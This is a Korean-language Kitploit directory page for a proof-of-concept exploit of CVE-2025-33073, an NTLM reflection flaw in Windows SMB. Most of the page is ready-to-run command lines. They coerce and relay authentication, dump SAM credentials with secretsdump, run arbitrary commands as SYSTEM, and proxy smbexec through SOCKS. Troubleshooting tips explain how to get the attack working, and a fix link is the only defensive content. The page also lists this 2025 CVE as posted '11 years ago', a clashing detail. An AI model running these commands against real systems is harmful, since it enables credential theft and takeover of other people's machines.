Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-33073 — NTLM 리플렉션 SMB 취약점에 대한 PoC 익스플로잇. | Kitploit
도구/GitHubGitHub/starscow/cve-2025-33073
Vulnerability AnalysisExploitationLateral MovementPost-ExploitationPenetration TestingRed Teaming
GitHubstarscow/cve-2025-33073

CVE-2025-33073

NTLM 리플렉션 SMB 취약점에 대한 PoC 익스플로잇.

저장소 보기
11년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-33073

NTLM 반사 SMB 결함에 대한 PoC 익스플로잇.

모든 크레딧은 공식 연구에 있습니다:
https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025

사전 요구 사항

OS: Kali Linux (대부분의 패키지가 사전 설치되어 있음).

  • NetExec (NXC) - https://github.com/Pennyw0rth/NetExec
  • impacket-ntlmrelayx
  • dnstool.py (저장소에 포함됨)
  • xterm (GUI 전용)

사용 예시

GUI

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65

image

CLI

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only

image

사용자 지정 명령
secretsdump를 실행하는 대신 사용자 지정 명령을 실행할 수 있습니다.

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only --custom-command "whoami"

image

SOCKS
SYSTEM으로 유효한 연결이 수립된 후 명령을 더 은밀하게 실행하기 위한 방법입니다. 여기서 --target과 --target-ip는 동일해야 합니다.

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --cli-only --socks

image 또한 SAM 덤프 대신 proxychains를 통해 사용자 지정 명령을 실행할 수도 있습니다.

root@kitploit:~
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec

image

DNS 요구 사항 없는 수동 익스플로잇

장치와 동일한 브로드캐스트 도메인에 있고 LLMNR 포이즈닝에 취약한 경우, DNS 레코드를 등록하지 않고도 장치를 익스플로잇할 수 있습니다.

image

문제 해결

  • 호스트 이름이 공격에 사용되어 Kali에서 DNS 조회가 발생하기 때문에 공격이 때때로 작동하지 않는 것을 확인했습니다. Kali가 DNS 서버를 사용하지 않거나 impacket-ntlmrelayx에서 '/ FAILED' 메시지가 표시되는 경우 호스트를 /etc/hosts 파일에 추가해 보세요. 그러면 공격이 작동할 것입니다.
  • IP를 사용하면 공격이 작동해야 합니다. 때로는 여러 번 실행하면 실패 대신 SUCCESS가 발생합니다. 지금까지 이 현상이 발생하는 이유는 완전히 명확하지 않습니다. 네트워킹과 관련이 있는 것으로 생각됩니다.
  • -M 또는 --method를 사용하여 다른 coerce 방법을 시도해 보세요.

Wireshark

로컬 NTLM 인증이 수행됨 image

로컬 NTLM 인증이 수행되지 않아 FAILED 시도가 발생함 image

알아두면 좋은 점

  • xterm은 가운데 마우스 버튼으로 복사 및 붙여넣기를 지원합니다.
  • DNS 레코드는 클라이언트에도 알려져야 하며, 경우에 따라 더 많은 시간이 걸릴 수 있습니다. 더 많은 시간이란 몇 분 정도 기다리라는 의미입니다.
  • 이것은 단순한 PoC이므로 AV/EDR 우회는 시도되지 않았습니다. 사용에 따른 책임은 본인에게 있습니다.

수정 방법

https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-33073

도구 다운로드